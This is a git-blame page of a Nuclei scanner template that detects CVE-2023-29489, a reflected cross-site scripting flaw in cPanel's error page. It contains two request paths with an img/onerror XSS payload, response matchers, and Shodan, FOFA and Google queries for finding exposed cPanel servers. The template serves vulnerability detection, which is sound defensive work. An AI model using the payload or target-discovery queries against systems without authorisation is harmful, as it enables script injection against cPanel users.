daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-29489.yaml

64 lines
2.3 KiB
YAML
Raw Permalink Normal View History

Create CVE-2023-29489.yaml
2023-04-27 01:00:20 +00:00
id: CVE-2023-29489
info:
updated req and matcher
2024-04-13 09:44:27 +00:00
name: cPanel < 11.109.9999.116 - Cross-Site Scripting
author: DhiyaneshDk,0xKayala
Create CVE-2023-29489.yaml
2023-04-27 01:00:20 +00:00
severity: medium
minor update
2023-05-30 09:57:27 +00:00
description: |
An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.
Added Impact
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
remediation: |
Apply the latest security patches or updates provided by cPanel to fix this vulnerability.
minor update
2023-05-30 09:57:27 +00:00
reference:
- https://blog.assetnote.io/2023/04/26/xss-million-websites-cpanel/
- https://nvd.nist.gov/vuln/detail/CVE-2023-29489
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
- https://forums.cpanel.net/threads/cpanel-tsr-2023-0001-full-disclosure.708949/
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot:
2024-03-23 09:28:19 +00:00
- https://github.com/SynixCyberCrimeMy/CVE-2023-29489
- https://github.com/learnerboy88/CVE-2023-29489
Updated CVE-2023-29489.yaml
2023-05-30 09:14:58 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-29489
cwe-id: CWE-79
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot:
2024-06-07 10:04:29 +00:00
epss-score: 0.00354
epss-percentile: 0.71955
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:*
Create CVE-2023-29489.yaml
2023-04-27 01:00:20 +00:00
metadata:
boolean format update
2023-06-04 08:13:42 +00:00
verified: true
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot:
2024-06-07 10:04:29 +00:00
max-request: 2
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
vendor: cpanel
product: cpanel
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot:
2024-06-07 10:04:29 +00:00
shodan-query:
- "title:\"cPanel\""
- http.title:"cpanel"
- cpe:"cpe:2.3:a:cpanel:cpanel"
- http.title:"cpanel - api codes"
fofa-query:
- "title=\"cpanel - api codes\""
- title="cpanel"
google-query:
- "intitle:\"cpanel - api codes\""
- intitle:"cpanel"
updated tags
2023-04-27 03:30:46 +00:00
tags: cve,cve2023,cpanel,xss
Create CVE-2023-29489.yaml
2023-04-27 01:00:20 +00:00
change of protocol attribute
2023-04-27 12:24:02 +00:00
http:
Create CVE-2023-29489.yaml
2023-04-27 01:00:20 +00:00
- method: GET
path:
- '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaa'
updated req and matcher
2024-04-13 09:44:27 +00:00
- '{{BaseURL}}/cpanelwebcall/<><img%20src=x%20onerror="prompt(document.domain)">'
Create CVE-2023-29489.yaml
2023-04-27 01:00:20 +00:00
updated req and matcher
2024-04-13 09:44:27 +00:00
stop-at-first-match: true
Create CVE-2023-29489.yaml
2023-04-27 01:00:20 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror="prompt(document.domain)">aaaaaaaaaaaa'
- 'Invalid webcall ID:'
condition: and
- type: status
status:
- 400
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot:
2024-06-08 16:02:17 +00:00
# digest: 490a0046304402200eeb293fb45080f8fe24ade360d2b725f37f3fe91271d74d972c46e7d5e439f802202a1364e4da300a7118361484b5e10c047d1a545d6dff08b59ed2989b090de0d6:922c64590222798bb761d5b6d8e72950